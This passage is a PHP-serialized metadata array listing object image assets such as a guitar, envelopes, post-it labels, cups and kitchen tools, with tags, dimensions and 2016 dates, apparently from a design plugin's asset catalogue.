15:34:49\";s:6:\"active\";s:1:\"1\";}i:171;a:13:{s:2:\"id\";s:3:\"171\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_guitar_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:6:\"Guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:170;a:13:{s:2:\"id\";s:3:\"170\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_envelope_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Closed Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:169;a:13:{s:2:\"id\";s:3:\"169\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_postit_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Postit Label White\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:168;a:13:{s:2:\"id\";s:3:\"168\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_envelope_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Open Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:167;a:13:{s:2:\"id\";s:3:\"167\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_eggs_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Egg Carton\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:166;a:13:{s:2:\"id\";s:3:\"166\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:25:\"object_bottleopener_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:165;a:13:{s:2:\"id\";s:3:\"165\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_blueprints_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Blueprints\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:164;a:13:{s:2:\"id\";s:3:\"164\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:22:\"object_holepunch_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Hole punch\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:163;a:13:{s:2:\"id\";s:3:\"163\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_speaker_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Black Speaker\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:162;a:13:{s:2:\"id\";s:3:\"162\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_eraser_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:6:\"Eraser\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"500\";s:6:\"height\";s:3:\"500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:161;a:13:{s:2:\"id\";s:3:\"161\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_vinylcover_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Vinyl Cover\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:160;a:13:{s:2:\"id\";s:3:\"160\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_booklet_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Booklet 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:159;a:13:{s:2:\"id\";s:3:\"159\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:22:\"object_earphones_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Earphones 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:158;a:13:{s:2:\"id\";s:3:\"158\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_vinyl_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:5:\"Vinyl\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:157;a:13:{s:2:\"id\";s:3:\"157\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_postit_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Postit Label Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:156;a:13:{s:2:\"id\";s:3:\"156\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_mechpencil_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Mechanical Pencil\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:155;a:13:{s:2:\"id\";s:3:\"155\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:22:\"object_turntable_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Turntable\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:154;a:13:{s:2:\"id\";s:3:\"154\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_folder_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:19:\"Closed Folder Black\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:153;a:13:{s:2:\"id\";s:3:\"153\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_postit_4.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Postit Label Green\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:152;a:13:{s:2:\"id\";s:3:\"152\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_folder_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Blank Folder\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:151;a:13:{s:2:\"id\";s:3:\"151\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_pencup_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:7:\"Pen Cup\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:150;a:13:{s:2:\"id\";s:3:\"150\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_winebottle_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Red Wine Bottle\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:149;a:13:{s:2:\"id\";s:3:\"149\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_headphones_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Headphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:148;a:13:{s:2:\"id\";s:3:\"148\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:22:\"object_earphones_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Earphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:147;a:13:{s:2:\"id\";s:3:\"147\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_postit_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:19:\"Postit Label Yellow\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:146;a:13:{s:2:\"id\";s:3:\"146\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:22:\"object_corkscrew_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:23:\"Corkscrew Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1300\";s:6:\"height\";s:4:\"1300\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";}i:145;a:13:{s:2:\"id\";s:3:\"145\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_muffin_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Chocolate Muffin\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:144;a:13:{s:2:\"id\";s:3:\"144\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_chair_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Yellow Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:143;a:13:{s:2:\"id\";s:3:\"143\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_knife_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:7:\"Knife 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:142;a:13:{s:2:\"id\";s:3:\"142\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:26:\"object_choppingboard_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Chopping Board 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:141;a:13:{s:2:\"id\";s:3:\"141\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:26:\"object_choppingboard_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Chopping Board 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:140;a:13:{s:2:\"id\";s:3:\"140\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_coffee_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Coffee Cup 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:4:\"1200\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:139;a:13:{s:2:\"id\";s:3:\"139\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_bread_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Croissant Bread\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:138;a:13:{s:2:\"id\";s:3:\"138\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_spoon_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Wodden Spoon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:137;a:13:{s:2:\"id\";s:3:\"137\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:26:\"object_choppingboard_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Chopping Board 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:136;a:13:{s:2:\"id\";s:3:\"136\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:16:\"object_cup_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Empty Cup 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:135;a:13:{s:2:\"id\";s:3:\"135\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_knife_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:5:\"Knife\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:134;a:13:{s:2:\"id\";s:3:\"134\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_spoon_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:5:\"Spoon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:133;a:13:{s:2:\"id\";s:3:\"133\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:16:\"object_cup_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Empty Cup\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:132;a:13:{s:2:\"id\";s:3:\"132\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_chair_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"White Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:131;a:13:{s:2:\"id\";s:3:\"131\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_coffee_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Coffee Cup\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:130;a:13:{s:2:\"id\";s:3:\"130\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_frypan_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Fry Pan 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";}i:129;a:13:{s:2:\"id\";s:3:\"129\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_frypan_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Fry Pan 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-17 